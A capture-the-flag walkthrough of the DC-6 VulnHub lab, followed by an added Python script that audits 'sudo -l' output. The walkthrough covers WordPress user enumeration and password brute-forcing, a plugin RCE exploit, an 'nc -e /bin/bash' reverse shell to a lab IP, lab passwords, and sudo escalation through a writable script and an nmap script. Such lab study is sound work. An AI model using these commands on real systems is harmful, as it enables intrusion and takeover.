DC-6 -- vulnhub range
2022-07-26 00:32:00 【Headwind/】
Range download address
Range clue:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
Decompress the wordlist on Kali
gzip -d rockyou.txt.gz
Host discovery

A redirect is found, so modify the hosts file
vim /etc/hosts

Website reconnaissance

The site runs WordPress, and it mentions plugins and security
Enumerating users
wpscan --url http://wordy/ -e u

Save the usernames, then brute-force the login with the password dictionary built from the clue
wpscan --url http://wordy/ -P /root/desktop/passwords.txt -U /root/desktop/user.txt
Username: mark, Password: helpdesk01
Log in to the site's admin backend
http://wordy/wp-login.php
After logging in to the backend, the Activity Monitor plugin is found; check whether it has any known vulnerabilities
getshell
searchsploit activity monitor

There is a remote code execution vulnerability; copy the exploit to the current path
searchsploit -m php/webapps/50110.py
Run it
python3 50110.py
When run, it asks for the target IP address and the backend login username and password; after successful execution you get a shell
nc -lvvp 4444
nc -e /bin/bash 192.168.194.156 4444

Get an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation
Reference
In the home directory, mark/stuff contains a file things-to-do.txt, which gives
user graham
password GSo7isUM1D4
Switch user
[email protected]:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4
Check which commands this user may run with sudo
[email protected]:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
Append "/bin/bash" to backups.sh, then run the script as the user jens
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
After it runs successfully, the shell switches to the jens user
This user can run nmap, so nmap can be used to escalate privileges
echo 'os.execute("/bin/sh")' >getShell
sudo nmap --script=getShell
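
Both escalation steps above come down to sudo rules a defender can catch in review: a sudo-permitted script that another user can edit, and a sudo-permitted binary that runs caller-supplied scripts. The following is an added example, not part of the original post, that parses `sudo -l` output and flags both; the function names, the `SCRIPTABLE` set and the group/world-writable mode-bit check are assumptions of this example (the post does not show the permissions on backups.sh).

```python
import os
import re
import stat

# Constructed input: abridged from the `sudo -l` output shown on this page.
SAMPLE = """Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass
User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
"""
SCRIPTABLE = {"nmap"}  # assumption: extend with other script-capable binaries
RULE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def parse_sudo_l(text):
    """Return (runas, nopasswd, command_path) for each rule in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines and headers carry no rule
        runas, tags, cmds = m.groups()
        for cmd in filter(None, (c.strip() for c in cmds.split(","))):
            rules.append((runas.strip(), "NOPASSWD:" in tags, cmd.split()[0]))
    return rules

def loosely_writable(path):
    """True if the file, or its non-sticky directory, is group/world-writable."""
    for p in (path, os.path.dirname(path) or "/"):
        try:
            mode = os.stat(p).st_mode
        except OSError:
            continue  # path absent on this host: nothing to inspect
        sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
        if mode & (stat.S_IWGRP | stat.S_IWOTH) and not sticky_dir:
            return True
    return False

def audit(text):
    """Return (command, reason) findings for risky sudo rules."""
    findings = []
    for runas, _nopasswd, cmd in parse_sudo_l(text):
        if os.path.basename(cmd) in SCRIPTABLE:
            findings.append((cmd, "runs caller-supplied scripts as " + runas))
        if loosely_writable(cmd):
            findings.append((cmd, "writable by users other than its owner"))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Run it on the host being audited, feeding it each account's `sudo -l` output, so the permission checks see the real files.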

Summary
Unfamiliar with the privilege escalation process